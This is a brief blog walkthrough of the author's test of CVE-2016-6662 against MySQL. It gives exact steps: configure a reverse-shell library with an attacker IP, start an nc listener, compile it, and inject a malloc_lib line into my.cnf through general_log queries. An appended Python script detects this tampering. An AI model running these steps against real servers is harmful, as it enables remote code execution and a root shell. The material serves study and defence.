• CVE-2016-6662 MySQL RCE test


    Reference: http://bobao.360.cn/learning/detail/3027.html . I tried the first method.

    1. First, change the reverse-connection address and port in mysql_hookandroot_lib.c:

    #define ATTACKERS_IP "xx.x.x.x"
    #define SHELL_PORT 81
    

    On the attacker's machine, set up a listener on the port and wait for the connection back:

    nc -lvv -p 81
    

      

    2. Compile the library:
    gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl


    3. Run the following statements:

    mysql> set global general_log_file = '/etc/my.cnf';
    
    mysql> set global general_log = on;
    
    mysql> select '
    [mysqld]
    malloc_lib=/tmp/mysql/mysql_hookandroot_lib.so
    
    [separator]
    
    ';
    
    mysql> set global general_log = off;
    

      

    4. The content added to my.cnf is now visible:

    /usr/local/mysql/bin/mysqld, Version: 5.5.48-log (Source distribution). started with:
    Tcp port: 3306 Unix socket: /tmp/mysql.sock
    Time Id Command Argument
    160914 17:45:16 1 Query select '
    [mysqld]
    malloc_lib=/tmp/mysql/mysql_hookandroot_lib.so
    
    [separator]
    
    '
    160914 17:45:22 1 Query set global general_log = off
    

      

    5. Then restart MySQL; the restart fails with an error:

    leo@ubuntu:~$ sudo /etc/init.d/mysql restart
    [....] Restarting mysql (via systemctl): mysql.serviceJob for mysql.service failed because the control process exited with error code. See "systemctl status mysql.service" and "journalctl -xe" for details.
    failed!
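
A defender-side check for the artifact shown in step 4, added here as an example and not part of the original post: it scans an option file's contents for general-log residue and for a `malloc_lib` directive that points outside trusted library directories. The function name `audit_mycnf`, the trusted-directory list and the sample text (constructed from the step 4 output) are assumptions of this example.

```python
import os
import re

# Directories a preloaded allocator may legitimately live in (assumption; adjust per host).
TRUSTED_LIB_DIRS = ("/usr/lib/", "/usr/lib64/", "/lib/", "/lib64/")

# Lines the general query log writes that never belong in an option file.
LOG_RESIDUE = [
    ("general-log banner", re.compile(r"^\S*mysqld, Version: .*started with:")),
    ("general-log column header", re.compile(r"^Time\s+Id\s+Command\s+Argument")),
    ("general-log entry", re.compile(r"^\d{6}\s+\d{1,2}:\d{2}:\d{2}\s+\d+\s+(Query|Connect|Quit)\b")),
]
MALLOC_LIB = re.compile(r"^\s*malloc[-_]lib\s*=\s*(\S+)")
SECTION = re.compile(r"^\s*\[([^\]]+)\]")

def audit_mycnf(text):
    """Return (line_no, kind, detail) findings for one option file's contents."""
    findings, section = [], None
    for no, line in enumerate(text.splitlines(), 1):
        m = SECTION.match(line)
        if m:
            section = m.group(1)  # remember which group a later directive sits in
            continue
        for kind, rx in LOG_RESIDUE:
            if rx.match(line):
                findings.append((no, kind, line.strip()))
                break
        m = MALLOC_LIB.match(line)
        # normpath collapses "../" so a traversal cannot pass the prefix check
        if m and not os.path.normpath(m.group(1)).startswith(TRUSTED_LIB_DIRS):
            findings.append((no, "untrusted malloc_lib", f"[{section}] {m.group(1)}"))
    return findings

# Constructed sample: an ordinary my.cnf followed by the log text shown in step 4.
SAMPLE = """\
[mysqld]
datadir=/var/lib/mysql
/usr/local/mysql/bin/mysqld, Version: 5.5.48-log (Source distribution). started with:
Time                 Id Command    Argument
160914 17:45:16     1 Query    select '
[mysqld]
malloc_lib=/tmp/mysql/mysql_hookandroot_lib.so
'
160914 17:45:22     1 Query    set global general_log = off
"""

if __name__ == "__main__":
    for finding in audit_mycnf(SAMPLE):
        print(finding)
```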
    
  • Original article: https://www.cnblogs.com/xiaoxiaoleo/p/5873091.html